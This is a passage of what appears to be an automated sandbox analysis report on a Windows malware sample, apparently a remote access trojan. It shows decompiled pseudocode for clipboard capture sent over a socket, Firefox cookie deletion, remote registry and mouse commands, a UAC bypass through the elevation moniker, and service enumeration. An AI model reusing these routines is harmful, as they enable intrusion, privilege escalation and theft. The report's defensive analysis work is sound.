                • GlobalUnlock.KERNEL32(00000000), ref: 00415870
                • SetClipboardData.USER32 ref: 00415879
                • CloseClipboard.USER32 ref: 00415896
                • OpenClipboard.USER32 ref: 0041589D
                • GetClipboardData.USER32 ref: 004158AD
                • GlobalLock.KERNEL32 ref: 004158B6
                • GlobalUnlock.KERNEL32(00000000), ref: 004158BF
                • CloseClipboard.USER32 ref: 004158C5
                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                • String ID: 4G
                • API String ID: 3520204547-3080958808
                • Opcode ID: ef08b53fe7de490e2c8f90236c35185acbcab73e7cd3014ef6914643d045bdcc
                • Instruction ID: f1afe3415f062d0b9b587beb2e8851fc1ee6a0bc4f4e9a56709fcddcee62baf9
                • Opcode Fuzzy Hash: ef08b53fe7de490e2c8f90236c35185acbcab73e7cd3014ef6914643d045bdcc
                • Instruction Fuzzy Hash: EF2158715083005BC714BF71EC5AAAE76A9AF90756F00483EFD06962E3EF38C905C66A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 92%
                			E0040B2B1(void* __edx, void* __edi, void* __eflags) {
                				char _v28;
                				char _v52;
                				char _v76;
                				char _v100;
                				char _v124;
                				struct _WIN32_FIND_DATAA _v444;
                				void* __ebx;
                				void* __esi;
                				void* __ebp;
                				void* _t30;
                				signed int _t44;
                				signed int _t46;
                				long _t60;
                				void* _t68;
                				void* _t69;
                				void* _t98;
                				void* _t103;
                				void* _t104;
                				void* _t105;
                				void* _t106;
                				void* _t107;
                
                				_t112 = __eflags;
                				_t103 = __edi;
                				E004020BF(_t68,  &_v52);
                				E004020BF(_t68,  &_v28);
                				_t30 = E00402073(_t68,  &_v100, __edx, _t106, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
                				E00401FC2( &_v28, _t31, _t104, E004052DD(_t68,  &_v76, E0043A9AA(_t68, __eflags, "UserProfile"), _t106, _t112, _t30));
                				E00401FB8();
                				E00401FB8();
                				_t101 =  &_v28;
                				_t105 = FindFirstFileA(E00401F8B(E00406292( &_v100,  &_v28, _t106, "*")),  &_v444);
                				E00401FB8();
                				_t113 = _t105 - 0xffffffff;
                				if(_t105 != 0xffffffff) {
                					while(1) {
                						__eflags = FindNextFileA(_t105,  &_v444);
                						if(__eflags == 0) {
                							break;
                						}
                						__eflags = _v444.dwFileAttributes & 0x00000010;
                						if((_v444.dwFileAttributes & 0x00000010) == 0) {
                							continue;
                						} else {
                							_t44 = E0043E5D0( &(_v444.cFileName), ".");
                							__eflags = _t44;
                							if(_t44 == 0) {
                								continue;
                							} else {
                								_t46 = E0043E5D0( &(_v444.cFileName), "..");
                								__eflags = _t46;
                								if(_t46 == 0) {
                									continue;
                								} else {
                									_t101 = E00406292( &_v124,  &_v28, _t106,  &(_v444.cFileName));
                									E00401FC2( &_v52, _t48, _t105, E00408832(_t68,  &_v76, _t48, _t103, _t106, __eflags, "\\cookies.sqlite"));
                									E00401FB8();
                									E00401FB8();
                									__eflags = DeleteFileA(E00401F8B( &_v52));
                									if(__eflags != 0) {
                										_t98 = _t107 - 0x18;
                										_push("\n[Firefox cookies found, cleared!]");
                										goto L2;
                									} else {
                										_t60 = GetLastError();
                										__eflags = _t60 != 0;
                										if(_t60 != 0) {
                											FindClose(_t105);
                											_t69 = 0;
                										} else {
                											continue;
                										}
                									}
                								}
                							}
                						}
                						goto L11;
                					}
                					E00402073(_t68, _t107 - 0x18, _t101, _t106, "\n[Firefox Cookies not found]");
                					E0040B752(_t68, _t101, _t106, __eflags);
                					FindClose(_t105);
                					goto L10;
                				} else {
                					FindClose(_t105);
                					_t98 = _t107 - 0x18;
                					_push("\n[Firefox Cookies not found]");
                					L2:
                					E00402073(_t68, _t98, _t101, _t106);
                					E0040B752(_t68, _t101, _t106, _t113);
                					L10:
                					_t69 = 1;
                				}
                				L11:
                				E00401FB8();
                				E00401FB8();
                				return _t69;
                			}

                APIs
                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B329
                • FindClose.KERNEL32(00000000), ref: 0040B343
                • FindNextFileA.KERNEL32(00000000,?), ref: 0040B403
                • FindClose.KERNEL32(00000000), ref: 0040B429
                • FindClose.KERNEL32(00000000), ref: 0040B44A
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Find$Close$File$FirstNext
                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                • API String ID: 3527384056-432212279
                • Opcode ID: 6e259262706716e35cf83066339bf0dd6887841de27ae9bc6657e2767c2a9b71
                • Instruction ID: 51cc95074229e97af50e91e82164566f02eb9ff2f5b37e3c54f7b0a52fa2c995
                • Opcode Fuzzy Hash: 6e259262706716e35cf83066339bf0dd6887841de27ae9bc6657e2767c2a9b71
                • Instruction Fuzzy Hash: 4D416C3194420A6ACB14FBA5DC56DEEB768AE51304F50017FF405B21D2FF389A45CA9E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 73%
                			E00418186(signed int __edx, void* __eflags, char _a8) {
                				void* _v28;
                				char _v32;
                				void* _v36;
                				void* _v40;
                				char _v44;
                				char _v48;
                				char _v52;
                				signed char* _t61;
                				char* _t62;
                				signed char* _t63;
                				intOrPtr* _t73;
                				intOrPtr* _t80;
                				char* _t87;
                				char* _t88;
                				char* _t89;
                				intOrPtr* _t90;
                				signed char* _t92;
                				char* _t93;
                				intOrPtr _t95;
                				signed int _t105;
                				void* _t108;
                				signed int _t148;
                
                				_t95 =  *((intOrPtr*)(E004051C3(0)));
                				E00404182( &_a8,  &_v32, 1, 0xffffffff);
                				if(_t95 != 0x30) {
                					__eflags = _t95 - 0x31;
                					if(_t95 != 0x31) {
                						__eflags = _t95 - 0x32;
                						if(_t95 != 0x32) {
                							__eflags = _t95 - 0x33;
                							if(_t95 != 0x33) {
                								__eflags = _t95 - 0x34;
                								if(_t95 != 0x34) {
                									__eflags = _t95 - 0x35;
                									if(_t95 != 0x35) {
                										__eflags = _t95 - 0x36;
                										if(_t95 != 0x36) {
                											__eflags = _t95 - 0x37;
                											if(_t95 == 0x37) {
                												_t61 = E004051C3(2);
                												_t62 = E004051C3(1);
                												_t63 = E004051C3(0);
                												_t105 =  *_t61 & 0x000000ff;
                												__eflags =  *_t62;
                												_push(_t105);
                												_t52 =  *_t62 != 0;
                												__eflags = _t52;
                												_push((_t105 & 0xffffff00 | _t52) & 0x000000ff);
                												_t108 = 0x4736e8;
                												goto L18;
                											}
                										} else {
                											_push(0);
                											_push(0x78);
                											goto L15;
                										}
                									} else {
                										_push(0);
                										_push(0xffffff88);
                										L15:
                										mouse_event(0x800, 0, 0, ??, ??);
                									}
                								} else {
                									_v40 =  *((intOrPtr*)(E004051C3(0)));
                									_v40 =  *((intOrPtr*)(E004051C3(4)));
                									E00418009( *((intOrPtr*)(E004051C3(8))),  &_v48,  &_v44);
                									E004184AD(_v48, _v44);
                								}
                							} else {
                								_t73 = E004051C3(0);
                								_v44 =  *((intOrPtr*)(E004051C3(4)));
                								_v44 =  *((intOrPtr*)(E004051C3(8)));
                								E00418009( *((intOrPtr*)(E004051C3(0xc))),  &_v52,  &_v48);
                								E0041844A( *_t73, _v52, _v48);
                								goto L8;
                							}
                						} else {
                							_t80 = E004051C3(0);
                							_v40 =  *((intOrPtr*)(E004051C3(4)));
                							_v48 =  *((intOrPtr*)(E004051C3(8)));
                							E00418009( *((intOrPtr*)(E004051C3(0xc))),  &_v48,  &_v52);
                							E004183E7( *_t80, _v48, _v52);
                							goto L8;
                						}
                					} else {
                						_t87 = E004051C3(4);
                						_t88 = E004051C3(3);
                						_t89 = E004051C3(2);
                						_t90 = E004051C3(0);
                						 *_t87 =  *_t88;
                						__eflags =  *_t89;
                						E004184EE( *_t90, __edx & 0xffffff00 |  *_t89 != 0x00000000, (( &_v40 & 0xffffff00 |  *_t87 != 0x00000000) & 0 |  *_t88 != 0x00000000) & 0x000000ff, ( &_v40 & 0xffffff00 |  *_t87 != 0x00000000) & 0x000000ff);
                						L8:
                					}
                				} else {
                					_t92 = E004051C3(2);
                					_t93 = E004051C3(1);
                					_t63 = E004051C3(0);
                					_t148 =  *_t92 & 0x000000ff;
                					_t177 =  *_t93;
                					_push(_t148);
                					_push((_t148 & 0xffffff00 |  *_t93 != 0x00000000) & 0x000000ff);
                					_t108 = 0x473630;
                					L18:
                					_push( *_t63 & 0x000000ff);
                					E00417825(_t108, _t177);
                				}
                				E00401FB8();
                				E00401FB8();
                				return 0;
                			}

                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: 0$06G$1$2$3$4$5$6$7$6G
                • API String ID: 0-3439518097
                • Opcode ID: 24ac2fc32beb33ce48cafe5b80d71fdfa07178e887ebd5d7dc0c99c1ba21e080
                • Instruction ID: 33774567b1f725210584e6ae4599f2175015db0efea207338ba601142af93ff7
                • Opcode Fuzzy Hash: 24ac2fc32beb33ce48cafe5b80d71fdfa07178e887ebd5d7dc0c99c1ba21e080
                • Instruction Fuzzy Hash: 3461C4709183019FD304EF21D861FAB7BA49F94710F14881FF9A26B2D1DF399A49CB66
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 81%
                			E004131DA(void* __edx, void* __eflags, char _a8) {
                				char _v36;
                				char _v48;
                				char _v52;
                				void* _v60;
                				char _v68;
                				char _v76;
                				char _v80;
                				char _v84;
                				char _v88;
                				char _v92;
                				char _v96;
                				char _v100;
                				char _v104;
                				char _v108;
                				struct _SECURITY_ATTRIBUTES _v112;
                				void* _v120;
                				char _v128;
                				void* __ebx;
                				void* __esi;
                				void* __ebp;
                				intOrPtr* _t75;
                				void* _t86;
                				void* _t97;
                				void* _t99;
                				void* _t100;
                				void* _t102;
                				void* _t103;
                				void* _t111;
                				void* _t118;
                				void* _t119;
                				void* _t121;
                				void* _t125;
                				void* _t130;
                				void* _t136;
                				void* _t140;
                				void* _t145;
                				void* _t151;
                				void* _t153;
                				void* _t154;
                				void* _t156;
                				void* _t157;
                				void* _t163;
                				void* _t165;
                				void* _t166;
                				void* _t168;
                				void* _t174;
                				void* _t176;
                				void* _t177;
                				void* _t179;
                				void* _t184;
                				void* _t185;
                				long _t188;
                				void* _t195;
                				void* _t207;
                				void* _t209;
                				void* _t220;
                				void* _t236;
                				void* _t250;
                				signed int _t327;
                				void* _t330;
                				void* _t332;
                				void* _t337;
                				void* _t339;
                				void* _t341;
                				signed int _t342;
                				void* _t344;
                				void* _t351;
                				signed int _t352;
                				void* _t355;
                				void* _t356;
                				void* _t357;
                				void* _t360;
                				void* _t365;
                				void* _t366;
                				void* _t368;
                				void* _t369;
                				void* _t371;
                				void* _t373;
                				void* _t374;
                				void* _t376;
                				void* _t378;
                				void* _t380;
                				void* _t385;
                
                				_t385 = __eflags;
                				_t325 = __edx;
                				_push(_t207);
                				_t75 = E00401F8B( &_a8);
                				_push(0xffffffff);
                				_t330 = 4;
                				_push(_t330);
                				_push( &_v52);
                				E00404182( &_a8);
                				_t355 = (_t352 & 0xfffffff8) - 0x4c;
                				E004020D6(_t207, _t355, __edx, _t385, 0x472ec8);
                				_t356 = _t355 - 0x18;
                				E004020D6(_t207, _t356, __edx, _t385,  &_v68);
                				E0041A976( &_v108, __edx);
                				_t357 = _t356 + 0x30;
                				_t337 =  *_t75 - 0x35;
                				if(_t337 == 0) {
                					E00401F66(_t207,  &_v76);
                					__eflags = E004021DA( &_v88) - 1;
                					if(__eflags > 0) {
                						L004086CB(_t207,  &_v80, _t325, E00401F8B(E00401E45( &_v88, _t325, _t351, __eflags, 1)));
                					}
                					E004020D6(_t207, _t357 - 0x18, _t325, __eflags, E00401E45( &_v88, _t325, _t351, __eflags, 0));
                					_t86 = E00401EE4( &_v84);
                					_t325 = 1;
                					_t220 = _t86;
                					L33:
                					E00412FF5(_t220, _t325, _t392);
                					L34:
                					E00401EE9();
                					L35:
                					E00401E6D( &_v88, _t325);
                					E00401FB8();
                					E00401FB8();
                					return 0;
                				}
                				_t339 = _t337 - 1;
                				if(_t339 == 0) {
                					_t97 = E00401F8B(E00401E45( &_v88, __edx, _t351, __eflags, 2));
                					_t99 = E00401F8B(E00401E45( &_v92, __edx, _t351, __eflags, 1));
                					_t332 = 0;
                					_t100 = E00401E45( &_v96, __edx, _t351, __eflags, 0);
                					_t360 = _t357 - 0x18;
                					E004020D6(_t207, _t360, _t325, __eflags, _t100);
                					_t102 = E00412F64(_t207, __eflags, _t97);
                					_t325 = _t99;
                					_t103 = E00412D0B(_t102, _t99);
                					_t362 = _t360 + 0x18 - 0x18;
                					_t236 = _t360 + 0x18 - 0x18;
                					__eflags = _t103;
                					if(__eflags == 0) {
                						_push("2");
                						L29:
                						E00402073(_t207, _t236, _t325, _t351);
                						E00404A81(0x473450, _t325, __eflags);
                						goto L35;
                					}
                					_push("1");
                					L18:
                					E00402073(_t207, _t236, _t325, _t351);
                					E00404A81(0x473450, _t325, __eflags);
                					E004020D6(_t207, _t362 - 0x18, _t325, __eflags, E00401E45( &_v120, _t325, _t351, __eflags, _t332));
                					_t111 = E00401F8B(E00401E45( &_v128, _t325, _t351, __eflags, 1));
                					_t325 = 0;
                					E00412FF5(_t111, 0, __eflags);
                					goto L35;
                				}
                				_t341 = _t339 - 1;
                				if(_t341 == 0) {
                					E0040415E(_t207,  &_v80, __edx, _t351, E00401F8B(E00401E45( &_v88, __edx, _t351, __eflags, 1)));
                					 *0x470d80 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), "SHDeleteKeyW");
                					_t118 = E00401EE4( &_v84);
                					_t119 = E00401E45( &_v96, _t325, _t351, __eflags, 0);
                					_t365 = _t357 - 0x18;
                					E004020D6(_t207, _t365, _t325, __eflags, _t119);
                					_t121 = E00412F64(_t207, __eflags, _t118);
                					_t366 = _t365 + 0x18;
                					__eflags =  *0x470d80(_t121);
                					if(__eflags != 0) {
                						_t250 = _t366 - 0x18;
                						_push("9");
                					} else {
                						_t125 = E0040245C();
                						_t342 = 2;
                						_t207 = E00413811( &_v84, "\\", _t125 - _t342);
                						__eflags = _t207 - 0xffffffff;
                						if(__eflags != 0) {
                							_t51 = _t207 + 1; // 0x1
                							_t130 = E004330A3( ~0x00BADBAD | _t51 * _t342, _t51 * _t342 >> 0x20, _t342, __eflags);
                							E0043E0D9(_t130, E00401EE4(E00408682( &_v84,  &_v36, 0, _t207)));
                							E00401EE9();
                							_t136 = E00401E45( &_v108, _t51 * _t342 >> 0x20, _t351, __eflags, 0);
                							_t368 = _t366 - 0x18;
                							E004020D6(_t207, _t368, _t51 * _t342 >> 0x20, __eflags, _t136);
                							_t325 = 0;
                							__eflags = 0;
                							E00412FF5(_t130, 0, 0,  ~0x00BADBAD | _t51 * _t342);
                							E004330AC(_t130);
                							_t369 = _t368 + 0x1c;
                						} else {
                							_t140 = E00401E45( &_v96, _t325, _t351, __eflags, 0);
                							_t371 = _t366 - 0x18;
                							E004020D6(_t207, _t371, _t325, __eflags, _t140);
                							_t325 = 0;
                							E00412FF5(0, 0, __eflags);
                							_t369 = _t371 + 0x18;
                						}
                						_t250 = _t369 - 0x18;
                						_push("8");
                					}
                					L10:
                					E00402073(_t207, _t250, _t325, _t351);
                					E00404A81(0x473450, _t325, __eflags);
                					goto L34;
                				}
                				_t344 = _t341 - 1;
                				if(_t344 == 0) {
                					_t145 = E0043A3AC(_t143, E00401F8B(E00401E45( &_v88, __edx, _t351, __eflags, 3)));
                					__eflags = _t145 - _t330;
                					if(__eflags == 0) {
                						E004351E0( &_v108, E00401F8B(E00401E45( &_v92, __edx, _t351, __eflags, _t330)), _t330);
                						_push(_v108);
                						_t151 = E00401F8B(E00401E45( &_v92, _t325, _t351, __eflags, 2));
                						_t153 = E00401F8B(E00401E45( &_v96, _t325, _t351, __eflags, 1));
                						_t332 = 0;
                						__eflags = 0;
                						_t154 = E00401E45( &_v100, _t325, _t351, 0, 0);
                						_t373 = _t357 + 0xc - 0x18;
                						E004020D6(_t207, _t373, _t325, __eflags, _t154);
                						_t156 = E00412F64(_t207, __eflags, _t151);
                						_t374 = _t373 + 0x18;
                						_t325 = _t153;
                						_t157 = E00412BA7(_t156, _t153);
                					} else {
                						__eflags = _t145 - 0xb;
                						if(__eflags == 0) {
                							E004351E0( &_v104, E00401F8B(E00401E45( &_v92, __edx, _t351, __eflags, _t330)), 8);
                							_t163 = E00401F8B(E00401E45( &_v92, _t325, _t351, __eflags, 2));
                							_t165 = E00401F8B(E00401E45( &_v96, _t325, _t351, __eflags, 1));
                							_t332 = 0;
                							_t166 = E00401E45( &_v100, _t325, _t351, __eflags, 0);
                							_t376 = _t357 + 0xc - 0x18;
                							E004020D6(_t207, _t376, _t325, __eflags, _t166);
                							_t168 = E00412F64(_t207, __eflags, _t163);
                							_t325 = _t165;
                							_t157 = E00412BEB(_t168, _t165, _v104, _v100);
                							_t374 = _t376 + 0x24;
                						} else {
                							_push(_t145);
                							E00401E45( &_v92, __edx, _t351, __eflags, _t330);
                							_push(E0040245C());
                							_push(E00401F8B(E00401E45( &_v92, __edx, _t351, __eflags, _t330)));
                							_t174 = E00401F8B(E00401E45( &_v96, _t325, _t351, __eflags, 2));
                							_t176 = E00401F8B(E00401E45( &_v100, _t325, _t351, __eflags, 1));
                							_t332 = 0;
                							_t177 = E00401E45( &_v104, _t325, _t351, __eflags, 0);
                							_t378 = _t357 - 0x18;
                							E004020D6(_t207, _t378, _t325, __eflags, _t177);
                							_t179 = E00412F64(_t207, __eflags, _t174);
                							_t325 = _t176;
                							_t157 = E00412AB8(_t179, _t176);
                							_t374 = _t378 + 0x28;
                						}
                					}
                					_t362 = _t374 - 0x18;
                					_t236 = _t374 - 0x18;
                					__eflags = _t157;
                					if(__eflags == 0) {
                						_push("5");
                						goto L29;
                					} else {
                						_push("4");
                						goto L18;
                					}
                				}
                				_t390 = _t344 != 1;
                				if(_t344 != 1) {
                					goto L35;
                				}
                				E0040415E(_t207,  &_v80, __edx, _t351, E00401F8B(E00401E45( &_v88, __edx, _t351, _t390, 1)));
                				_t184 = E00401EE4( &_v84);
                				_t185 = E00401E45( &_v96, __edx, _t351, _t390, 0);
                				_t380 = _t357 - 0x18;
                				E004020D6(_t207, _t380, _t325, _t390, _t185);
                				_t188 = RegCreateKeyExW(E00412F64(_t207, _t390, _t184), 0, 0, 0, 0x20006, 0,  &_v112, 0, ??);
                				_t349 = _t188;
                				RegCloseKey(_v120);
                				_t382 = _t380 + 0x18 - 0x18;
                				_t250 = _t380 + 0x18 - 0x18;
                				_t391 = _t188;
                				if(_t188 != 0) {
                					_push("7");
                					goto L10;
                				}
                				E00402073(_t207, _t250, _t325, _t351, "6");
                				_push(0x72);
                				E00404A81(0x473450, _t325, _t391);
                				_t209 = E0040869C( &_v108, 0x473450, 0x473450);
                				_t392 = _t209 - 0xffffffff;
                				if(_t209 != 0xffffffff) {
                					_t14 = _t209 + 1; // 0x1
                					_t327 = 2;
                					_t195 = E004330A3( ~(__eflags > 0) | _t14 * _t327, _t14 * _t327 >> 0x20, _t349, __eflags);
                					E0043E0D9(_t195, E00401EE4(E00408682( &_v96,  &_v48, 0, _t209)));
                					E00401EE9();
                					E004020D6(_t209, _t382 - 0x18, _t14 * _t327 >> 0x20, __eflags, E00401E45( &_v120, _t14 * _t327 >> 0x20, _t351, __eflags, 0));
                					_t325 = 0;
                					E00412FF5(_t195, 0, __eflags,  ~(__eflags > 0) | _t14 * _t327);
                					E004330AC(_t195);
                					goto L34;
                				} else {
                					E004020D6(_t209, _t382 - 0x18, _t325, _t392, E00401E45( &_v108, _t325, _t351, _t392, 0));
                					_t325 = 0;
                					_t220 = 0;
                					goto L33;
                				}
                			}

                APIs
                • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004132AF
                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004132BB
                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004135B1
                • GetProcAddress.KERNEL32(00000000), ref: 004135B8
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: AddressCloseCreateLibraryLoadProcsend
                • String ID: P4G$P4G$P4G$P4G$SHDeleteKeyW$Shlwapi.dll
                • API String ID: 2127411465-531188865
                • Opcode ID: 75e3aaf9eb3c0f46d7df2fdcc2099b2be679f92e198cfa9533ad35c7f1b345ea
                • Instruction ID: ee582708a1ecfa71abd053f628b5a3b7b6646190f40a2f0f90fdaba40559649c
                • Opcode Fuzzy Hash: 75e3aaf9eb3c0f46d7df2fdcc2099b2be679f92e198cfa9533ad35c7f1b345ea
                • Instruction Fuzzy Hash: 07E1FD72A0430067C614BB76DC579AE32A99F95718F40063FF906B71E2ED7D8B44829F
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 15%
                			E00406B71(void* __edx, void* __eflags, signed int* _a8) {
                				signed int _v8;
                				intOrPtr _v24;
                				char _v44;
                				char _v564;
                				void* _t14;
                				char* _t25;
                				char* _t34;
                
                				_push("[+] ucmAllocateElevatedObject\n");
                				E00406874(__eflags);
                				_v8 = _v8 & 0x00000000;
                				_t33 = L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}";
                				_t34 = 0x80004005;
                				_t14 = E0043A3D6(L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}");
                				_t38 = _t14 - 0x40;
                				if(_t14 <= 0x40) {
                					E00406804();
                					_v44 = 0x24;
                					_v24 = 4;
                					E0043E0D9( &_v564, L"Elevation:Administrator!new:");
                					E0043E0FB( &_v564, _t33);
                					E00406874(_t38);
                					_t25 =  &_v564;
                					__imp__CoGetObject(_t25,  &_v44, 0x4644e0,  &_v8, "[+] CoGetObject\n");
                					_t34 = _t25;
                					_t39 = _t34;
                					if(_t34 == 0) {
                						_push("[+] CoGetObject SUCCESS\n");
                					} else {
                						_push("[-] CoGetObject FAILURE\n");
                					}
                					E00406874(_t39);
                				}
                				 *_a8 = _v8;
                				return _t34;
                			}











                APIs
                • _wcslen.LIBCMT ref: 00406B95
                • CoGetObject.OLE32(?,00000024,004644E0,00000000), ref: 00406BF6
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Object_wcslen
                • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                • API String ID: 240030777-3166923314
                • Opcode ID: 37b0210f552b79fdcc0f43efa47c6e279d7bbc4e5013fe63c4ecb2df5bec6842
                • Instruction ID: 6bce67489c7e09321c684eae8049871ec0f9a08aead341868aa49f1d7bf40555
                • Opcode Fuzzy Hash: 37b0210f552b79fdcc0f43efa47c6e279d7bbc4e5013fe63c4ecb2df5bec6842
                • Instruction Fuzzy Hash: 91110A72901218A6DB10F7D5C845F8E77BCDB44714F11006BF905B2280EB7CCA54867E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			E004192A3(void* __ecx, void* __edx) {
                				void* __ebx;
                				void* __edi;
                				void* __ebp;
                				void* _t100;
                				void* _t107;
                				int _t108;
                				long _t110;
                				void* _t133;
                				void* _t194;
                				short** _t195;
                				int _t196;
                				struct _ENUM_SERVICE_STATUS* _t197;
                				int _t198;
                				struct _QUERY_SERVICE_CONFIG* _t201;
                				void* _t202;
                
                				_t185 = __edx;
                				_t200 = 0;
                				_t194 = __ecx;
                				 *((intOrPtr*)(_t202 + 0x3c)) = __ecx;
                				_t133 = OpenSCManagerA(0, 0, 4);
                				if(_t133 != 0) {
                					_t135 = _t202 + 0x4c;
                					E00401F66(_t133, _t202 + 0x4c);
                					 *(_t202 + 0x18) = 0;
                					 *(_t202 + 0x18) = 0;
                					 *(_t202 + 0x28) = 0;
                					__eflags = EnumServicesStatusW(_t133, 0x3b, 3, _t202 + 0xa4, 0, _t202 + 0x20, _t202 + 0x18, _t202 + 0x20);
                					if(__eflags != 0) {
                						L12:
                						CloseServiceHandle(_t133);
                						E00403242(_t133, _t194, _t200, __eflags, _t202 + 0x4c);
                						E00401EE9();
                						L13:
                						return _t194;
                					}
                					__eflags = GetLastError() - 0xea;
                					if(__eflags != 0) {
                						goto L12;
                					}
                					_t196 =  *(_t202 + 0x18);
                					_push(_t196);
                					_t200 = E0043A620(_t135);
                					 *(_t202 + 0x30) = _t200;
                					EnumServicesStatusW(_t133, 0x3b, 3, _t200, _t196, _t202 + 0x20, _t202 + 0x18, _t202 + 0x20);
                					_t197 = 0;
                					 *(_t202 + 0x28) = 0;
                					__eflags =  *(_t202 + 0x14);
                					if(__eflags <= 0) {
                						L11:
                						L0043A61B(_t200);
                						goto L12;
                					}
                					_t195 = _t200;
                					_t201 =  *(_t202 + 0x2c);
                					do {
                						E0040323D(E004042DC(_t133, _t202 + 0x64, _t195[1], _t201, __eflags, E0040415E(_t133, _t202 + 0x38, _t185, _t201, "\t")));
                						E00401EE9();
                						E00401EE9();
                						E0040323D(E004042DC(_t133, _t202 + 0x34,  *_t195, _t201, __eflags, E0040415E(_t133, _t202 + 0x68, _t195[1], _t201, "\t")));
                						E00401EE9();
                						E00401EE9();
                						_t100 = E0040415E(_t133, _t202 + 0x80,  *_t195, _t201, "\t");
                						_t185 = E0041A762(_t133, _t202 + 0x64, _t195[3]);
                						E0040323D(E00402F85(_t202 + 0x38, _t101, _t100));
                						E00401EE9();
                						E00401EE9();
                						E00401EE9();
                						 *(_t202 + 0x1c) =  *(_t202 + 0x1c) & 0x00000000;
                						_t107 = OpenServiceW(_t133,  *_t195, 1);
                						_t160 = _t202 + 0x1c;
                						 *(_t202 + 0x24) = _t107;
                						_t108 = QueryServiceConfigW(_t107, _t201, 0, _t202 + 0x1c);
                						__eflags = _t108;
                						if(_t108 == 0) {
                							_t110 = GetLastError();
                							__eflags = _t110 - 0x7a;
                							if(_t110 == 0x7a) {
                								_t198 =  *(_t202 + 0x1c);
                								_push(_t198);
                								_t201 = E0043A620(_t160);
                								QueryServiceConfigW( *(_t202 + 0x30), _t201, _t198, _t202 + 0x1c);
                								_t199 = "\t";
                								E0040323D(E00402FF4(_t133, _t202 + 0x80, E0041A762(_t133, _t202 + 0x34,  *_t201), _t195, _t201, __eflags, "\t"));
                								E00401EE9();
                								E00401EE9();
                								E0040323D(E00402FF4(_t133, _t202 + 0x80, E0041A762(_t133, _t202 + 0x34,  *((intOrPtr*)(_t201 + 4))), _t195, _t201, __eflags, "\t"));
                								E00401EE9();
                								E00401EE9();
                								_t185 = E004042DC(_t133, _t202 + 0x38,  *((intOrPtr*)(_t201 + 0xc)), _t201, __eflags, E0040415E(_t133, _t202 + 0x6c, _t119, _t201, _t199));
                								E0040323D(E00402FF4(_t133, _t202 + 0x80, _t125, _t195, _t201, __eflags, "\n"));
                								E00401EE9();
                								E00401EE9();
                								E00401EE9();
                								L0043A61B(_t201);
                								_t197 =  *(_t202 + 0x2c);
                							}
                						}
                						CloseServiceHandle( *(_t202 + 0x24));
                						_t197 = _t197 + 1;
                						_t195 =  &(_t195[9]);
                						 *(_t202 + 0x28) = _t197;
                						__eflags = _t197 -  *(_t202 + 0x14);
                					} while (__eflags < 0);
                					_t194 =  *(_t202 + 0x30);
                					_t200 =  *(_t202 + 0x2c);
                					goto L11;
                				}
                				E0040415E(_t133, _t194, _t185, 0, 0x46a8f0);
                				goto L13;
                			}



















                APIs
                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00473838), ref: 004192B9
                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419308
                • GetLastError.KERNEL32 ref: 00419316
                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041934E
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                • String ID:
                • API String ID: 3587775597-0
                • Opcode ID: 85ca114e2818de7ccd32f15da29a077d45459a29e699abf73d51743d0292195a
